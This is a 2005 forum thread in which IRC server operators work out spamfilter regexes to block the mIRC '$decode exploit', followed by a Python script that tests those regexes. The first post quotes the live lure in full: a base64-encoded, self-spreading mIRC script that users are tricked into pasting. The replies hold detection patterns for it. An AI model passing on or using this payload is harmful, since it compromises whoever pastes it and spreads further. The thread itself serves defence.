decode exploit

Posted: Thu Sep 08, 2005 12:16 pm
by droolin
We received a decode exploit PM yesterday, and I thought it was covered.
The message was:
<noxchi_rose> Want to be an OPERATOR in #mircpopup-magic ? copy/paste this-> //write   $decode(b24gMTp0ZXh0Oio6Izp7IC5pZ25vcmUgJG5pY2sgfCAudGltZXKgIDAgMTIwIC5qb2luICNNYW5pbGEgfCAubXNnICRuaWNrIFdhbnQgdG8gYmUgYW4gT1BFUkFUT1IgaW4gJGNoYW4gPyBjb3B5L3Bhc3RlIHRoaXMtPgMxNCAvL3dyaXRlIKAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAgJGNocigxMjQpIC8vbW9kZSAkICQrIG1lICtSIH0=,
What I think was set up in the spamfilter.conf to catch this, which is commented out, is the following:

Code:

/*
spamfilter {
        regex "//write \$decode\(.+\|.+load -rs";
        target { private; channel; };
        reason "Generic $decode exploit";
        action block;
};
*/
Would this work???

Code:

spamfilter {
        regex "//write \$decode\(.+";
        target { private; channel; };
        reason "Generic $decode exploit";
        action block;
};
Any help on this would be greatly appreciated.

droolin

Posted: Thu Sep 08, 2005 4:21 pm
by DeadNotBuried
It looks to me like they added an extra space before the $decode to get around the spamfilters.

I'd suggest using ".*//write +\$decode\(.+" as the regex, as it will get any number of spaces in there, or for the truly paranoid ".*\$decode.*"

Thank you, very much appreciated

Posted: Thu Sep 08, 2005 4:41 pm
by droolin
God, I really am blind. I did not see the extra space at all.
Appreciate the help.

droolin

Posted: Fri Sep 09, 2005 4:49 am
by aquanight
Also, you need to double the \ used in spamfilters in the config file (not those in /spamfilter).

Personally, I'd just use this:

Code:

spamfilter {
    word "\\$decode";
    target "pcnNPqat";
    reason "Just use /dcc ...";
    action block;
};
There's about nothing I can think of that I'd use $decode rather than /dcc.

I did think about that

Posted: Fri Sep 09, 2005 12:14 pm
by droolin
I was thinking, who would use the $decode in a normal conversation.
We have some scripters, but basically I don't see them using the decode for anything.
The only thing I was worried about was when people were kicking scripting ideas around, on how to best do something.
And possibly getting caught then.
If we keep having problems though, that's what I'll end up doing. Solves the problem once and for all.

Thank you, very much appreciated.

droolin

Posted: Sat Sep 10, 2005 10:24 pm
by Jason
Why are we trying to escape the $ in $decode? It has no meaning except as the last character.

Posted: Sat Sep 10, 2005 10:30 pm
by aquanight
Because I'm paranoid like that? :P
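
Added example, not part of the thread: a Python check of the regexes quoted above against constructed sample lines, showing which filters the extra spaces slip past and which one also catches ordinary scripting talk. It assumes Python's `re` behaves like the IRCd's regex engine for these patterns and that matching is unanchored and case-insensitive; `PAYLOAD` is a placeholder for the encoded blob.

```python
import re

# Regexes quoted in the thread (single backslashes, as typed for /spamfilter).
PATTERNS = {
    "commented_out": r"//write \$decode\(.+\|.+load -rs",
    "droolin":       r"//write \$decode\(.+",
    "any_spaces":    r".*//write +\$decode\(.+",
    "paranoid":      r".*\$decode.*",
}

# Constructed sample lines; PAYLOAD stands in for the base64 blob.
SAMPLES = {
    "one_space":    "copy/paste this-> //write $decode(PAYLOAD,m) | .load -rs",
    "three_spaces": "copy/paste this-> //write   $decode(PAYLOAD,",
    "script_talk":  "you could use $decode(%x,m) to read that back",
    "plain_chat":   "anyone know how to write a popup for mIRC?",
}

def hits(pattern, text):
    """True if the pattern matches anywhere in the line (assumed unanchored, case-insensitive)."""
    return re.search(pattern, text, re.IGNORECASE) is not None

def coverage():
    """Map each filter name to the set of sample names it would block."""
    return {name: {s for s, line in SAMPLES.items() if hits(rx, line)}
            for name, rx in PATTERNS.items()}

if __name__ == "__main__":
    for name, blocked in coverage().items():
        print(f"{name:14} blocks {sorted(blocked)}")
```

Running a candidate filter over a few known-bad and known-good lines like this before loading it shows both the misses and the false positives droolin was worried about.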